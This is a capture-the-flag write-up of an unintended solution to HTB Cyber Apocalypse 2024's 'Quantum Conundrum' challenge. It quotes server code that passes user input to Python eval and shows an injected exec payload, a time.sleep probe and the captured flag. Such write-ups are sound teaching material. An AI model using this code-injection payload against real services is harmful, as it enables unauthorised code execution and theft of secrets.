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HTB Cyber Apocalypse 2024: Hacker Royale - Quantum Conundrum


KORP™, the heartless corporation orchestrating our battles in The Fray, has pushed us to our limits. Refusing to be a pawn in their twisted game, I’ve learned of a factionless rebel alliance plotting to dismantle KORP™. While it may sound like mere whispers, there’s a chance it holds truth. Rumors suggest they’ve concealed a vital communication system within The Fray, powered by cutting-edge quantum computing technology. Unfortunately, this system is reportedly malfunctioning. If I can restore this communication network, it could be the key to toppling KORP™ once and for all. However, my knowledge of quantum computing is limited. This is where you come in! As I infiltrate The Fray to access the system, I’ll rely on your expertise to identify and repair the issue. Are you up for the challenge? Together, we can make a difference in this battle against oppression.



This one was an unintended solution from us. One of my teammates (@veloxer) started this challenge and asked for some new ideas at 1 AM. We immediatelly identified that there is an eval in the application which might be exploitable.

But moving a few steps back (the challenge folder contains the challenge files):

        input: typing.List = req.recv(4096).decode().strip().split(";")
        req.sendall(b"\n % Testing quantum circuit, please wait...\n")
        tests_passes = []
        for _ in range(100):
            communication_system: CommunicationSystem = start_communication_system()
    def add_instructions(self, instructions: typing.List):
        if len(instructions) > 10:
            raise CommunicationSystemException("Instruction set is too big")
        [self._add_gate(CircuitInstruction(**(eval(gate)))) for gate in instructions]

eval only allows one statement, but we can start with exec which can handle multiple statements. We can test our theory by inputing time.sleep(5), the server will wait 5 seconds.

Now we have a few options:

exec('raise __import__("communication_system").exceptions.CommunicationSystemException(__import__("secret").flag)')
nc 38229

| Quantum Renegades Communication System     |
| + System initilization  [Success!]         |
| + Quantum Circuit tests [Failed...]        |
| + Receiver decoding     [Success!]         |
|                                            |
| > Input instruction set for fix...         |
|                                            |

> exec('raise __import__("communication_system").exceptions.CommunicationSystemException(__import__("secret").flag)')

 % Testing quantum circuit, please wait...


Flag: HTB{4lways_us3_a_b3ll_4_t3leportat1on}

You can read the intended solution at